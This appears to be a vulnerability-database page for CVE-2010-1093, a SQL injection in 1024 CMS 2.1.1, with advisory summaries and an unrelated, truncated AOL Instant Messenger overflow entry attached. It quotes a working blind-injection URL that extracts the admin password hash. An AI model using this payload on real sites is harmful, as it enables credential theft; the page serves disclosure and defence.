CVE-2010-1093
published 2010-03-24CVE-2010-1093: SQL injection vulnerability in rss.php in 1024 CMS 2.1.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the…
PriorityP338medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
0.88%
54.6th percentile
SQL injection vulnerability in rss.php in 1024 CMS 2.1.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter in a vp action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 1024cms | 1024_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
1024 CMS 2.1.1 rss.php ID sql injection (EDB-14942 / BID-38476)
vuldb·2026-05-03·CVSS 6.8
CVE-2010-1093 [MEDIUM] 1024 CMS 2.1.1 rss.php ID sql injection (EDB-14942 / BID-38476)
A vulnerability described as critical has been identified in 1024 CMS 2.1.1. This vulnerability affects unknown code of the file rss.php. Executing a manipulation of the argument ID can lead to sql injection.
This vulnerability is registered as CVE-2010-1093. It is possible to launch the attack remotely. Furthermore, an exploit is available.
GHSA
GHSA-6r8x-4f4r-3rrj: SQL injection vulnerability in rss
ghsa_unreviewed·2022-05-02
CVE-2010-1093 [MEDIUM] CWE-89 GHSA-6r8x-4f4r-3rrj: SQL injection vulnerability in rss
SQL injection vulnerability in rss.php in 1024 CMS 2.1.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter in a vp action.
No detection rules found.
Exploit-DB
1024 CMS 2.1.1 - Blind SQL Injection
exploitdb·2010-09-07
CVE-2010-1093 1024 CMS 2.1.1 - Blind SQL Injection
1024 CMS 2.1.1 - Blind SQL Injection
---
# Exploit Title: 1024cms 2.1.1 Blind SQL Injection Vulnerability
# Date: 07.09.2010
# Author: Stephan Sattler // Solidmedia.de
# Software Website: http://1024cms.org
# Software Link: http://d10xg45o6p6dbl.cloudfront.net/projects/f/freecms1024/1024_v2.zip
or http://sourceforge.net/projects/cms-cvi/files/v2.1.zip/download
# Version: 2.1.1
[ Vulnerability//PoC ]
http://[site]/[path]/rss.php?t=vp&id=1'+AND+(SELECT+MID(o.password,1,1)+FROM+otatf_users+o+WHERE+o.id=1)='[first character of admin hash]
example: http://[site]/[path]/rss.php?t=vp&id=1'+AND+(SELECT+MID(o.password,1,1)+FROM+otatf_users+o+WHERE+o.id=1)='c
Exploit-DB
AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Remote Buffer Overflow
exploitdb·2000-12-12
CVE-2000-1093 AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Remote Buffer Overflow
AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/2118/info
AOL Instant Messenger (AIM) is a real time messaging service for users that are on line. When AOL Instant Messenger is installed, by default it configures the system so that the aim: URL protocol connects aim:// urls to the AIM client. There exists a buffer overflow in parsing aim:// URL parameters.
This vulnerability exists in versions of AOL Instant previous to Messenger 4.3.2229. By sending a specially crafted URL ,using the 'aim:' protocol, comprised of 'goim' and 'screenname' parameters, it is possible for a remote user to overflow the buffer during a memory copy operation and execute arbitarary code.
It should be noted that the victim nee
No writeups or analysis indexed.
2010-03-24
Published